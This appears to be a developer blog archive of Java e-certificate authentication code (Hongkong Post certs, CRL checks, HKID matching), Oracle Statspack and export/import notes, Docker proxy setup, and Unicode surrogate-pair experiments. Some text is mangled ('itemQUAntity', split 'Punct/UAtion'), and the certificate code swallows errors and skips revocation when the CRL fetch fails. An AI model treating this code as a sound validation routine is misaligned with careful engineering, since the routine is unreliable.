import java.security.cert.CertPath;
import java.security.cert.CertPathValidator;
import java.security.cert.CertPathValidatorException;
import java.security.cert.CertStore;
import java.security.cert.Certificate;
import java.security.cert.CertificateEncodingException;
import java.security.cert.CertificateException;
import java.security.cert.CertificateExpiredException;
import java.security.cert.CertificateFactory;
import java.security.cert.CertificateNotYetValidException;
import java.security.cert.CertificateParsingException;
import java.security.cert.CollectionCertStoreParameters;
import java.security.cert.PKIXCertPathValidatorResult;
import java.security.cert.PKIXParameters;
import java.security.cert.TrustAnchor;
import java.security.cert.X509CRL;
import java.security.cert.X509Certificate;
import java.util.Collections;
import java.util.Enumeration;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.ResourceBundle;
import java.util.Set;
import java.util.Vector;
import com.ibm.security.util.ObjectIdentifier;
import com.ibm.security.x509.Extension;
import com.ibm.security.x509.X509CertImpl;

public class Authenticator {
  private static final String start = "-----BEGIN CERTIFICATE-----\n";
  private static final String end = "-----END CERTIFICATE-----";

  private ResourceBundle m_configuration = ResourceBundle.getBundle("dh.properties.pkcs12");
  private KeyStore m_keyStore = null;
  private boolean keyStoreLoaded = false;
  private String certificateID = "";
  private X509Certificate certificate;
  private String password = "";

  public KeyStore loadKeyStore(final InputStream inStream, final String password) throws KeyStoreException,
          NoSuchAlgorithmException, CertificateException, IOException {
      String keyStoreType = m_configuration.getString("KEY_STORE_TYPE");
      try {
          m_keyStore = KeyStore.getInstance(keyStoreType);
      } catch (KeyStoreException e) {
          e.printStackTrace();
          throw e;
      }

      System.out.println("load the p12 file");
      if (password != null) {
          this.password = password;
          m_keyStore.load(inStream, password.toCharArray());
      } else {
          m_keyStore.load(inStream, null);
      }

      System.out.println("file is loaded successful");
      keyStoreLoaded = true;

      return m_keyStore;
  }

  public String getCertificateID() throws KeyStoreException {
      System.out.println("calling getCertificateID()"); //$IGN_Avoid_standard_output_input_error$<working as intended> //$IGN_Remove_System_print_or_println_statements$<working as intended>
      if (!keyStoreLoaded) {
          throw new KeyStoreException("Key store has not been loaded.");
      }

      StringBuffer result = new StringBuffer();

      try {
          Enumeration<String> aliases = m_keyStore.aliases();
          while (aliases.hasMoreElements()) {
              String alias = aliases.nextElement();
              if (m_keyStore.isKeyEntry(alias)) {
                  result.append(alias);
              }
          }
      } catch (KeyStoreException e) {
          e.printStackTrace();
          throw e;
      }

      return result.toString();
  }

  public String getEncocdedCertificate() throws KeyStoreException {
      System.out.println("calling getCertificate()"); //$IGN_Avoid_standard_output_input_error$<working as intended> //$IGN_Remove_System_print_or_println_statements$<working as intended>

      if (!keyStoreLoaded) {
          throw new KeyStoreException("Key store has not been loaded.");
      }

      try {
          certificate = retrieveCertificate();
      } catch (Exception e) {
          e.printStackTrace();
          return "";
      }

      try {
          return start + new String(BASE64Coder.encode(certificate.getEncoded())) + "\n" + end;
      } catch (CertificateEncodingException e) {
          e.printStackTrace();
      }
      return "";
  }

  private X509Certificate retrieveCertificate() throws KeyStoreException, CertificateExpiredException,
          CertificateNotYetValidException {
      if (!keyStoreLoaded) {
          throw new KeyStoreException("Key store has not been loaded.");
      }

      Certificate cert = m_keyStore.getCertificate(certificateID);

      if (cert == null) {
          //System.out.println("Searching for all aliases");
          Enumeration<String> aliases = m_keyStore.aliases();

          while (aliases.hasMoreElements()) {
              String alias = aliases.nextElement().trim();

              if (m_keyStore.isKeyEntry(alias)) {
                  cert = m_keyStore.getCertificate(alias);

                  if (cert == null) {
                      continue;
                  }

              }
          }
      }

      if (cert instanceof X509Certificate) {
          certificate = (X509Certificate) cert;
      }

      try { //$IGN_Place_try_catch_out_of_loop$<working as intended>
          certificate.checkValidity();
      } catch (CertificateExpiredException e) {
          System.out.println(e);
          throw e;
      } catch (CertificateNotYetValidException e) {
          System.out.println(e);
          throw e;
      } //$IGN_Always_use_caught_exception$<working as intended>

      return certificate;
  }

  public String getSubjectDN() throws CertificateExpiredException, CertificateNotYetValidException, KeyStoreException {
      certificate = retrieveCertificate();
      try {
          String principal = certificate.getSubjectX500Principal().getName();
          return principal;
      } catch (Exception e) {
          String subjectDNName = certificate.getSubjectDN().getName();
          return subjectDNName;
      }
  }

  public void checkCRL() throws CertPathValidatorException {
      System.out.println("calling checkCRL");
      if (certificate == null) {
          try {
              certificate = retrieveCertificate();
          } catch (Exception e) {
              e.printStackTrace();
          }
      }

      CertPath cp = null;
      Vector<Certificate> certs = new Vector<Certificate>();

      // load the cert to be checked
      certs.add(certificate);

      // handle location of CRL
      //System.out.println("Using the CRL specified in the " + "cert to check the revocation status of: "
      //  + certs.elementAt(0));
      System.setProperty("com.sun.security.enableCRLDP", "true");

      CertificateFactory cf = null;
      // init cert path
      PKIXParameters params = null;
      try {
          cf = CertificateFactory.getInstance("X509");
          cp = (CertPath) cf.generateCertPath(certs);

          // load the root CA cert
          String rootCaCert = m_configuration.getString("ROOT_CA_CERT");
          X509Certificate rootCACert = getCertFromFile(rootCaCert);
          System.out.println("rootCACert = " + rootCACert);

          // init trusted certs
          TrustAnchor ta = new TrustAnchor(rootCACert, null);
          Set<TrustAnchor> trustedCerts = new HashSet<TrustAnchor>();
          trustedCerts.add(ta);

          // init PKIX parameters
          params = new PKIXParameters(trustedCerts);
      } catch (CertificateException e) {
          System.out.println(e);
          return;
      } catch (Exception e) {
          System.out.println(e);
          return;
      }

      URL url = null;
      X509CertImpl certificateImpl = (X509CertImpl) certificate;

      Set<String> oids = certificateImpl.getNonCriticalExtensionOIDs();
      for (String key : oids) {
          System.out.println("key = " + key);
          try {
              Extension e = certificateImpl.getExtension(new ObjectIdentifier(key));
              String val = e.toString();
              if (val.indexOf("CRLDistributionPoints") != -1) {
                  int start = val.indexOf("http");
                  int end = val.indexOf(".crl");
                  url = new URL(val.substring(start, end + 4));
              }
          } catch (Exception ex) {
              System.out.println(ex);
          }
      }

      // load the CRL
      try {
          if (url != null) {
              URLConnection connection = url.openConnection();
              connection.setDoInput(true);
              connection.setUseCaches(false);
              DataInputStream inStream = new DataInputStream(connection.getInputStream());
              X509CRL crl = (X509CRL) cf.generateCRL(inStream);
              inStream.close();

              params.addCertStore(CertStore.getInstance("Collection", new CollectionCertStoreParameters(Collections
                      .singletonList(crl))));
              params.setRevocationEnabled(true);
          }
      } catch (Exception e) {
          System.out.println("fail to load url " + url);
          System.out.println(e);
      }

      // perform validation
      try {
          CertPathValidator cpv = CertPathValidator.getInstance("PKIX");

          PKIXCertPathValidatorResult cpv_result = (PKIXCertPathValidatorResult) cpv.validate(cp, params);
          X509Certificate trustedCert = (X509Certificate) cpv_result.getTrustAnchor().getTrustedCert();
          if (trustedCert == null) {
              System.out.println("Trusted Cert = NULL");
          } else {
              System.out.println("Trusted CA DN = " + trustedCert.getSubjectDN());
          }
          System.out.println("CERTIFICATE VALIDATION SUCCEEDED");
      } catch (NoSuchAlgorithmException e) {
          System.out.println(e);
      } catch (CertPathValidatorException e) {
          e.printStackTrace();
          throw e;
      } catch (InvalidAlgorithmParameterException e) {
          System.out.println(e);
      }
  }

  private static X509Certificate getCertFromFile(String path) {
      X509Certificate cert = null;
      try {
          File certFile = new File(path);
          if (!certFile.canRead())
              throw new IOException(" File " + certFile.toString() + " is unreadable");

          FileInputStream fis = new FileInputStream(path);
          CertificateFactory cf = CertificateFactory.getInstance("X509");
          cert = (X509Certificate) cf.generateCertificate(fis);

      } catch (Exception e) {
          System.out.println("Can't construct X509 Certificate. " + e.getMessage());
      }
      return cert;
  }

  /**
   * GeneralName ::= CHOICE {
   *     otherName                       [0]     OtherName,
   *     rfc822Name                      [1]     IA5String,
   *     dNSName                         [2]     IA5String,
   *     x400Address                     [3]     ORAddress,
   *     directoryName                   [4]     Name,
   *     ediPartyName                    [5]     EDIPartyName,
   *     uniformResourceIdentifier       [6]     IA5String,
   *     iPAddress                       [7]     OCTET STRING,
   *     registeredID                    [8]     OBJECT IDENTIFIER}
   * @see java.security.cert.X509Certificate#getSubjectAlternativeNames()
   * @link http://www.ietf.org/rfc/rfc2459.txt
   */
  private String getDomainName() {
      String domainName = "";

      try {
          Iterator it = certificate.getSubjectAlternativeNames().iterator();
          while (it.hasNext()) {
              List list = (List) it.next();
              if (((Integer) list.get(0)).intValue() == 2) {
                  domainName = list.get(1).toString();
              }
          }

      } catch (CertificateParsingException e) {
          // TODO Auto-generated catch block
          e.printStackTrace();
      }

      return domainName;
  }

  private String encodeID(String hkid) {
      Signature signature = null;
      PrivateKey key = null;
      String hashAlgorithm = "SHA-1";
      try {
          key = (PrivateKey) m_keyStore.getKey(getCertificateID(), this.password.toCharArray());
          String signingAlgorithm = "SHA1with" + key.getAlgorithm();
          signature = Signature.getInstance(signingAlgorithm);
      } catch (UnrecoverableKeyException e) {
          System.out.println("UnrecoverableKeyException " + e);
      } catch (KeyStoreException e) {
          System.out.println("KeyStoreException " + e);
      } catch (NoSuchAlgorithmException e) {
          System.out.println("NoSuchAlgorithmException " + e);
      }

      try {
          signature.initSign(key);
          signature.update(hkid.getBytes("UTF-8"));

          byte[] signed = signature.sign();
          MessageDigest digest = null;
          digest = MessageDigest.getInstance(hashAlgorithm);
          //System.out.println("Got MD algorithm");
          String encodedID = new String(BASE64Coder.encode(digest.digest(signed)));
          System.out.println("Done hashing");
          return encodedID;
          //signature.initVerify(certificate.getPublicKey());
          /*if (signature.verify(signed)) {

          }*/
      } catch (Exception ignore) {
          System.out.println("Exception " + ignore);
      }
      return "";
  }

  public boolean checkHKID(String hkid) {
      System.out.println("check HKID");
      String domainName = getDomainName();
      String encodedID = encodeID(hkid);

      System.out.println("domainName = " + domainName);
      System.out.println("encodedID = " + encodedID);

      if (encodedID.length() != domainName.length())
          return false;

      for (int i = 0; i < encodedID.length(); i++)
          if (encodedID.charAt(i) != domainName.charAt(i))
              return false;

      return true;
  }
}

— Class 2 —
Using it

Authenticator auth = new Authenticator();
      try {
          auth.loadKeyStore(in, certPin);
      } catch (KeyStoreException e) {
          System.out.println("KeyStoreException error = " + e.getMessage());
          errMsg = bundle.getString(ErrMsgConfig.ECERT00007);
      } catch (NoSuchAlgorithmException e) {
          System.out.println("NoSuchAlgorithmException error = " + e.getMessage());
          errMsg = bundle.getString(ErrMsgConfig.ECERT00019);
      } catch (CertificateException e) {
          System.out.println("CertificateException error = " + e.getMessage());
          errMsg = bundle.getString(ErrMsgConfig.ECERT00007);
      } catch (IOException e) {
          System.out.println("IOException error = " + e.getMessage());
          errMsg = bundle.getString(ErrMsgConfig.ECERT00019);
      }

      String subjectDN = "";

      if (errMsg.length() == 0) {
          try {
              subjectDN = auth.getSubjectDN();
          } catch (CertificateExpiredException e) {
              System.out.println("CertificateExpiredException error = " + e.getMessage());
              errMsg = bundle.getString(ErrMsgConfig.ECERT00002);
          } catch (CertificateNotYetValidException e) {
              System.out.println("CertificateNotYetValidException error = " + e.getMessage());
              errMsg = bundle.getString(ErrMsgConfig.ECERT00003);
          }
      }

      System.out.println("subject: " + subjectDN);
      if (errMsg.length() == 0) {
          try {
              boolean valid = RmiSignVerifier.checkCRL(auth.getEncocdedCertificate());
              if (!valid) {
                  errMsg = bundle.getString(ErrMsgConfig.ECERT00014);
              }
          } catch (CertPathValidatorException e) {
              System.out.println("CertPathValidatorException error = " + e.getMessage());
              errMsg = bundle.getString(ErrMsgConfig.ECERT00004);
          }
      }

      if (errMsg.length() == 0) {
          req.setAttribute("errMsg", errMsg);

          List<Rdn> names = new LdapName(subjectDN).getRdns();
          for (Rdn name : names) {
              System.out.println("rdn " + name.getType() + ", " + name.getValue());
              String value = name.getValue().toString();

              if (name.getType().equals("O")) {
                  if (value.indexOf("Hongkong Post") == -1) {
                      errMsg = bundle.getString(ErrMsgConfig.ECERT00007);
                  }

                  if (value.indexOf(CERT_TYPE_ORGANIZATIONAL) != -1) {
                      certType = CERT_TYPE_ORGANIZATIONAL;
                  } else {
                      certType = CERT_TYPE_PERSONAL;
                  }
              }

              if (name.getType().equals("OU")) {
                  Pattern p = Pattern.compile("\\d+");

                  if (p.matcher(value).matches()) { // check digit
                      if (value.length() > 10) {
                          brc = value.substring(0, 8);
                          brcBranchCode = value.substring(8, 11);
                      } else {
                          srn = value;
                          session.setAttribute("CERT_SRC_NO", srn);
                          System.out.println("srn " + srn);
                      }
                  }
              }
              if (name.getType().equals("CN")) {
                  holdername = value;
                  session.setAttribute("holdername", holdername);
                  System.out.println("holdername: " + holdername);
              }
          }

          System.out.println("certificate Type " + certType);

          if (certType.equals(CERT_TYPE_PERSONAL)) {
              if (!auth.checkHKID(userHKID)) {
                  errMsg = bundle.getString(ErrMsgConfig.ECERT00008);
              }
          }
      }

With oracle java api, it can be used to get crl path elegantly.

CRLDistributionPointsExtension crlDistributionPointsExtension = certificateImpl.getCRLDistributionPointsExtension();

if (crlDistributionPointsExtension != null) {
    try {
        for (DistributionPoint distributionPoint : ((List<DistributionPoint>) crlDistributionPointsExtension
                .get(CRLDistributionPointsExtension.POINTS))) {
            for (GeneralName generalName : distributionPoint.getFullName().names()) {
                String generalNameString = generalName.toString();
                System.out.println(generalNameString);
                String crlURLString = generalNameString.substring(9);
                crlUrl = new URL(crlURLString);
            }
        }
    } catch (Exception ex) {
        throw new CertPathValidatorException(ex);
    }
}

But finally check whether CRL is revoked, just call crl.isrevoked to work. Damn!

2014-10-16

2014-10-16

stackpack

Get all snapshot

select * from STATS$snapshot;

Check database instance

1 2	select * from STATS$DATABASE_INSTANCE; – in case database restarted, an error will be thrown as ORA-20200: The instance was shutdown between snapshots 981 and 982 select * from v$instance;

Run stackpack

sqlplus perfstat/password@“(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521))(CONNECT_DATA=(SERVICE_NAME=xxrac)))”
@$ORACLE_HOME/rdbms/admin/spreport.sql
OR
@?/rdbms/admin/spreport.sql

Purge stackpack

1
2
3

@$ORACLE_HOME/rdbms/admin/sppurge.sql
OR
@?/rdbms/admin/sppurge.sql

Oracle jobs

1
2
3

select * from user_jobs; SELECT job, next_date, next_sec, failures, broken, SUBSTR(what,1,40) DESCRIPTION FROM dba_jobs; 
EXEC dbms_job.broken(24, false); 
EXEC dbms_job.run(24, false); – reset job when failure 16 attemps to run

Oracle job for schedule run sppurge

——————– Check the snap present before 20 days ——————–

select count(*) from stats$snapshot where snap_time < sysdate-20

----Create the procedure which will purge statspack snapshot after 20 days gap---------
create or replace procedure statspackpurge is
var_lo_snap number;
var_hi_snap number;
var_db_id number;
var_instance_no number;
noofsnapshot number;
n_count number ;
begin

n_count := 0;

select count(*) into n_count from stats$snapshot where snap_time < sysdate-20;

if n_count > 0 then

select min(s.snap_id) , max(s.snap_id),max(di.dbid),max(di.instance_number) into  var_lo_snap, var_hi_snap,var_db_id,var_instance_no
  from stats$snapshot s
     , stats$database_instance di
 where s.dbid              = di.dbid
   and s.instance_number   = di.instance_number
   and di.startup_time     = s.startup_time
   and s.snap_time < sysdate-20;

  noofsnapshot := statspack.purge( i_begin_snap      => var_lo_snap
                                      , i_end_snap        => var_hi_snap
                                      , i_snap_range      => true
                                      , i_extended_purge  => false
                                      , i_dbid            => var_db_id
                                      , i_instance_number => var_instance_no);

 dbms_output.Put_line('snapshot deleted'||to_char(noofsnapshot));

end if;
end;
/

——————– check the job already exits in the database ——————–

1	SELECT job, next_date, next_sec, failures, broken, SUBSTR(what,1,40) DESCRIPTION FROM dba_jobs;

——————– scheduled the job at mid night ——————–

declare
  my_job number;
begin
  dbms_job.submit(job => my_job,
    what => 'statspackpurge;',
    next_date => trunc(sysdate)+1,
    interval => 'trunc(sysdate)+1');
end;
/

————– Another way———————————————————-

variable v_jobno number;
begin
dbms_job.submit(:v_jobno,'statspack.purge(i_num_days=>15,i_extended_purge=>TRUE);',trunc(sysdate)+1+2/24,'SYSDATE',TRUE);
commit;
end;
/

Reference

Stackpack
http://www.oracle-base.com/articles/8i/statspack-8i.php
http://docs.oracle.com/cd/B10500_01/server.920/a96533/statspac.htm

Oracle job
http://www.orafaq.com/wiki/DBMS_JOB
http://www.dba-oracle.com/tips_oracle_statspack_purge_utility.htm
http://myoracleworld.hobby-electronics.net/DB-statspack.html
http://dbaworks-sunny.blogspot.hk/2012/12/statspack-purge-script-for-scheduling.html
http://docs.oracle.com/cd/B19306_01/appdev.102/b14258/d_job.htm#i1000769

2014-05-20

2014-05-20

Dive Into Docker

Step

install VirtualBox-4.2.24-92790-Win.exe
check whether CPU is support virtualization technology with software cpu-z
1-3.CPU進階技術講解
 i5-4670
i5-4670
enable vt-x in BIOS
Enabling Intel VT-x and AMD-V virtualization hardware extensions in BIOS
run book2docker.iso in VirtualBox http://docs.docker.io/installation/windows/
set proxy and run docker sudo HTTP_PROXY=http://192.168.56.1:21/ docker -d &
Docker Tip - If you are running docker behind proxy
Using Docker behind a firewall
pull busybox and base docker pull busybox docker pull base
sudo docker run busybox echo hello wolrd
sudo docker run -i -t busybox /bin/bash

Ubuntu 14.04

Host-only ethernet adapter in VirtualBox

sudo apt-get update
sudo apt-get install openssh-server -y
sudo apt-get install docker -y
sudo ln /usr/bin/docker.io /usr/local/bin/docker
sudo service docker.io stop
sudo HTTP_PROXY=http://192.168.56.1:21/
docker -d &
alias d='sudo docker'

Proxy

apt-get
create a file named proxy in /etc/apt/apt.conf.d/ as below,
Acquire::http::Proxy “http://192.168.56.1:21”;
git
git config –global http.proxy http://192.168.56.1:21
wget
/etc/wgetrc -> http_proxy = http://192.168.56.1:21
docker
sudo HTTP_PROXY=http://192.168.56.1:21/ docker.io -d &
curl
export http_proxy=http://192.168.56.1:21/
export https_proxy=http://192.168.56.1:21/

Reference

boot2docker
lightweight_docker_experience_on_osx
docs.docker.io
TheDockerBook_sample

2014-05-05

2014-05-05

Migration

#Call external bat (do not use cmd /c) and substring in bat file

call C:\Production_ATV_Windows_LD\ATV.bat -L > filename.txt

FOR /F "tokens=2 delims=][" %%i in (filename.txt) do set today=%%i

call C:\Production_ATV_Windows_LD\ATV.bat -DD -FilePre %today% -Overwrite

rem set today=PPSC140429
set today=%today:~0,10% 
#Export/Import data from oracle 9i to oracle11g

export NLS_LANG=TRADITIONAL CHINESE_HONG KONG.AL32UTF8
export schema : exp usr/passwd@uatrac file=db.dmp ROWS=N log=db.log
edit db.dmp and change tablespace from ABC to XYZ
import schema : imp usr/passwd@prdrac file=db.dmp log=db.log
export data : exp usr/passwd@uatrac tables=ABC file=db.dmp INDEXES=N CONSTRAINTS=N GRANTS=N ROWS=Y log=db.log
disable insert triggers
import data : imp usr/passwd@prdrac file=data.dmp IGNORE=Y INDEXES=N CONSTRAINTS=N GRANTS=N ROWS=Y fromUser=abc toUser=xyz commit=y buffer=1024000 log=db.log

2014-03-20

2014-03-20

Some findings on studying surrogate pair

HKSCS

Unicode surrogate programming with the Java language
谈Unicode编码，简要解释UCS、UTF、BMP、BOM等名词
 HKSCS-2004 Support for Windows Platform
「HKSCS compatibility」– 香港字集兼容方案
 Hong Kong Supplementary Character Set - 2004
HKSCS
HKSCS 字碼表
 Win7 睇香港字問題
 關於Windows 7用code page 951既問題
 XML Services
Universal Character Set characters - Surrogates
Block-U20000-CJK-Unified-Ideographs-Extension-B
Unicode5.2.0
Java中的字符集编码入门技巧
 Chinese / HKSCS 2004 conversion script

Surrogate

Why UTF-32 instead of UTF-16 if we have surrogate pairs?
handling-unicode-surrogate-values-in-java-strings
what-is-a-surrogate-pair-in-java
Java中的字符集编码入门（六）Java中的增补字符

Piccolo XML Parser for Java

Sample

1 2	00000010 00100100 01100101 10001011 10111001

28BB9

►Unicode Code Point Blocks - Code Charts

U0000: C0 Controls and Basic Latin
U0080: C1 Controls and Latin-1 Supplement
U0100: Latin Extended-A
U0180: Latin Extended-B
U0250: IPA Extensions
U02B0: Spacing Modifier Letters
U0300: Combining Diacritical Marks
U0370: Greek and Coptic
U0400: Cyrillic
U0500: Cyrillic Supplement
U0530: Armenian
U0590: Hebrew
U0600: Arabic
U0700: Syriac
U0750: Arabic Supplement
U0780: Thaana
U07C0: NKo
U0800: Samaritan
U0840: Mandaic
U08A0: Arabic Extended-A
U0900: Devanagari
U0980: Bengali
U0A00: Gurmukhi
U0A80: Gujarati
U0B00: Oriya
U0B80: Tamil
U0C00: Telugu
U0C80: Kannada
U0D00: Malayalam
U0D80: Sinhala
U0E00: Thai
U0E80: Lao
U0F00: Tibetan
U1000: Myanmar
U10A0: Georgian
U1100: Hangul Jamo
U1200: Ethiopic
U1380: Ethiopic Supplement
U13A0: Cherokee
U1400: Unified Canadian Aboriginal Syllabics
U1680: Ogham
U16A0: Runic
U1700: Tagalog
U1720: Hanunoo
U1740: Buhid
U1760: Tagbanwa
U1780: Khmer
U1800: Mongolian
U18B0: Unified Canadian Aboriginal Syllabics Extended
U1900: Limbu
U1950: Tai Le
U1980: New Tai Lue
U19E0: Khmer Symbols
U1A00: Buginese
U1A20: Tai Tham
U1B00: Balinese
U1B80: Sundanese
U1BC0: Batak
U1C00: Lepcha
U1C50: Ol Chiki
U1CC0: Sundanese Supplement
U1CD0: Vedic Extensions
U1D00: Phonetic Extensions
U1D80: Phonetic Extensions Supplement
U1DC0: Combining Diacritical Marks Supplement
U1E00: Latin Extended Additional
U1F00: Greek Extended
U2000: General Punct
UAtion
U2070: Superscripts and Subscripts
U20A0: Currency Symbols
U20D0: Combining Diacritical Marks for Symbols
U2100: Letterlike Symbols
U2150: Number Forms
U2190: Arrows
U2200: Mathematical Operators
U2300: Miscellaneous Technical
U2400: Control Pictures
U2440: Optical Character Recognition
U2460: Enclosed Alphanumerics
U2500: Box Drawing
U2580: Block Elements
U25A0: Geometric Shapes
U2600: Miscellaneous Symbols
U2700: Dingbats
U27C0: Miscellaneous Mathematical Symbols-A
U27F0: Supplemental Arrows-A
U2800: Braille Patterns
U2900: Supplemental Arrows-B
U2980: Miscellaneous Mathematical Symbols-B
U2A00: Supplemental Mathematical Operators
U2B00: Miscellaneous Symbols and Arrows
U2C00: Glagolitic
U2C60: Latin Extended-C
U2C80: Coptic
U2D00: Georgian Supplement
U2D30: Tifinagh
U2D80: Ethiopic Extended
U2DE0: Cyrillic Extended-A
U2E00: Supplemental Punct
UAtion
U2E80: CJK Radicals Supplement
U2F00: Kangxi Radicals
U2FF0: Ideographic Description Characters
U3000: CJK Symbols and Punct
UAtion
U3040: Hiragana
U30A0: Katakana
U3100: Bopomofo
U3130: Hangul Compatibility Jamo
U3190: Kanbun
U31A0: Bopomofo Extended
U31C0: CJK Strokes
U31F0: Katakana Phonetic Extensions
U3200: Enclosed CJK Letters and Months
U3300: CJK Compatibility
U3400: CJK Unified Ideographs Extension A
U4DC0: Yijing Hexagram Symbols
U4E00: CJK Unified Ideographs
UA000: Yi Syllables
UA490: Yi Radicals
UA4D0: Lisu
UA500: Vai
UA640: Cyrillic Extended-B
UA6A0: Bamum
UA700: Modifier Tone Letters
UA720: Latin Extended-D
UA800: Syloti Nagri
UA830: Common Indic Number Forms
UA840: Phags-pa
UA880: Saurashtra
UA8E0: Devanagari Extended
UA900: Kayah Li
UA930: Rejang
UA960: Hangul Jamo Extended-A
UA980: Javanese
UAA00: Cham
UAA60: Myanmar Extended-A
UAA80: Tai Viet
UAAE0: Meetei Mayek Extensions
UAB00: Ethiopic Extended-A
UABC0: Meetei Mayek
UAC00: Hangul Syllables
UD7B0: Hangul Jamo Extended-B
UD800: High Surrogates
UDB80: High Private Use Surrogates
UDC00: Low Surrogates UE000: Private Use Area
UF900: CJK Compatibility Ideographs
UFB00: Alphabetic Presentation Forms
UFB50: Arabic Presentation Forms-A
UFE00: Variation Selectors
UFE10: Vertical Forms
UFE20: Combining Half Marks
UFE30: CJK Compatibility Forms
UFE50: Small Form Variants
UFE70: Arabic Presentation Forms-B
UFF00: Halfwidth and Fullwidth Forms
UFFF0: Specials
U10000: Linear B Syllabary
U10080: Linear B Ideograms
U10100: Aegean Numbers
U10140: Ancient Greek Numbers
U10190: Ancient Symbols
U101D0: Phaistos Disc
U10280: Lycian
U102A0: Carian
U10300: Old Italic
U10330: Gothic
U10380: Ugaritic
U103A0: Old Persian
U10400: Deseret
U10450: Shavian
U10480: Osmanya
U10800: Cypriot Syllabary
U10840: Imperial Aramaic
U10900: Phoenician
U10920: Lydian
U10980: Meroitic Hieroglyphs
U109A0: Meroitic Cursive
U10A00: Kharoshthi
U10A60: Old South Arabian
U10B00: Avestan
U10B40: Inscriptional Parthian
U10B60: Inscriptional Pahlavi
U10C00: Old Turkic
U10E60: Rumi Numeral Symbols
U11000: Brahmi
U11080: Kaithi
U110D0: Sora Sompeng
U11100: Chakma
U11180: Sharada
U11680: Takri
U12000: Cuneiform
U12400: Cuneiform Numbers and Punctuation
U13000: Egyptian Hieroglyphs
U16800: Bamum Supplement
U16F00: Miao
U1B000: Kana Supplement
U1D000: Byzantine Musical Symbols
U1D100: Musical Symbols
U1D200: Ancient Greek Musical Notation
U1D300: Tai XUAn Jing Symbols
U1D360: Counting Rod Numerals
U1D400: Mathematical Alphanumeric Symbols
U1EE00: Arabic Mathematical Alphabetic Symbols
U1F000: Mahjong Tiles
U1F030: Domino Tiles
U1F0A0: Playing Cards
U1F100: Enclosed Alphanumeric Supplement
U1F200: Enclosed Ideographic Supplement
U1F300: Miscellaneous Symbols And Pictographs
U1F600: Emoticons
U1F680: Transport And Map Symbols
U1F700: Alchemical Symbols ►
U20000: CJK Unified Ideographs Extension B
U2A700: CJK Unified Ideographs Extension C
U2B740: CJK Unified Ideographs Extension D
U2F800: CJK Compatibility Ideographs Supplement UE0000: Tags UE0100: Variation Selectors Supplement
UF0000: Supplementary Private Use Area-A
U100000: Supplementary Private Use Area-B Outdated Tutorials

package xx;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.math.BigDecimal;
import java.math.BigInteger;

import org.apache.xmlbeans.XmlException;
import org.apache.xmlbeans.impl.piccolo.xml.XMLStreamReader;
import org.openuri.easypo.LineItem;
import org.openuri.easypo.PurchaseOrderDocument;

public class Test {
    public static void main(String[] args) throws IOException, XmlException {

        String u = "\uD840\uDC08asasa";

        System.out.println(u + "+ " + u.length());
        System.out.println(Character.isHighSurrogate(u.charAt(0)));
        System.out.println("isSupplementaryCodePoint " + Character.isSupplementaryCodePoint(u.charAt(0)));
        System.out.println((int) u.charAt(1));
        System.out.println("codePoint = > " + (int) u.codePointAt(0) + ", 0x" + Integer.toHexString(u.codePointAt(0)));

        System.out.println("@@@ " + u.codePointCount(0, u.length()));

        String s = String.valueOf(Character.toChars(0x200D9));
        System.out.println("<<< " + Character.isSupplementaryCodePoint(0x200D9));
        char[] chars = s.toCharArray();
        for (char c : chars) {
            System.out.format("BB => %x\n", (short) c);
        }

        System.out.format("hex -> decimal %s\n", 0x2F81A);

        InputStream in = new FileInputStream("C:/easypo.xml");
        byte[] bufferd = new byte[4096];
        int length = 0;
        StringBuilder sb = new StringBuilder();
        while ((length = in.read(bufferd)) != -1) {
            sb.append(new String(bufferd, 0, length, "UTF-16BE"));
        }

        OutputStream os = new FileOutputStream("C:/out2.txt");
        //OutputStreamWriter wr = new OutputStreamWriter(os);
        os.write(0xfe);
        os.write(0xff);

        // UTF-8
        //os.write(0xef);
        //os.write(0xbb);
        //os.write(0xbf);

        StringBuilder sb2 = new StringBuilder();
        for (int i = 1; i < sb.length() - 1; i++) {
            //sb2.append(sb.charAt(i));

            //System.out.println("code Point => " + sb.charAt(i + 1));
            if (Character.isHighSurrogate(sb.charAt(i)) || Character.isLowSurrogate(sb.charAt(i))) {

                String code = Integer.toHexString(sb.charAt(i));
                os.write(Integer.decode("0x" + code.substring(0, 2)));
                os.write(Integer.decode("0x" + code.substring(2, 4)));

                code = Integer.toHexString(sb.charAt(i + 1));
                os.write(Integer.decode("0x" + code.substring(0, 2)));
                os.write(Integer.decode("0x" + code.substring(2, 4)));

                i++;
            } else {
                if (Character.isDefined(sb.charAt(i)))
                    sb2.append(sb.charAt(i));
            }
        }

        File poXmlFile = new File("C:/easypo.xml");
        //System.out.println("AAAAAAAAA " + sb2.toString());

        String updatedPoXml = addLineItem(sb2.toString(), s, "5", "20.00", "6");
        //String updatedPoXml = addLineItem(poXmlFile, "a new Item", "5", "20.00", "6");
        //System.out.println(new String(updatedPoXml.getBytes("UTF-8"), "UTF-8"));

        //wr.close();
        os.close();

    }

    private static String addLineItem(String purchaseOrder, String itemDescription, String perUnitOuncesString,
            String itemPriceString, String itemQuantityString) throws XmlException, IOException {
        PurchaseOrderDocument poDoc = null;

        XMLStreamReader reader = new XMLStreamReader();
        poDoc = PurchaseOrderDocument.Factory.parse(purchaseOrder);

        // Convert incoming data to types that can be used in accessors.
        BigDecimal perUnitOunces = new BigDecimal(perUnitOuncesString);
        BigDecimal itemPrice = new BigDecimal(itemPriceString);
        BigInteger itemQUAntity = new BigInteger(itemQuantityString);

        // Add the new element.
        LineItem newItem = poDoc.getPurchaseOrder().addNewLineItem();
        newItem.setDescription(itemDescription);
        newItem.setPerUnitOunces(perUnitOunces);
        newItem.setPrice(itemPrice);
        newItem.setQuantity(itemQuantity);

        return poDoc.toString();
    }
}

private String processInterfaceStr(String interfaceStr, HashMap extBCharMap) throws IOException {
        StringBuilder output = new StringBuilder();

        for (int i = 0; i < interfaceStr.length(); i++) {
            if (Character.isHighSurrogate(interfaceStr.charAt(i))
                    || Character.isLowSurrogate(interfaceStr.charAt(i))) {
                ByteArrayOutputStream surrogatePair = new ByteArrayOutputStream();
                String code = Integer.toHexString(interfaceStr.charAt(i));
                int part1 = Integer.decode("0x" + code.substring(0, 2));
                int part2 = Integer.decode("0x" + code.substring(2, 4));

                surrogatePair.write(part1);
                surrogatePair.write(part2);

                code = Integer.toHexString(interfaceStr.charAt(i + 1));
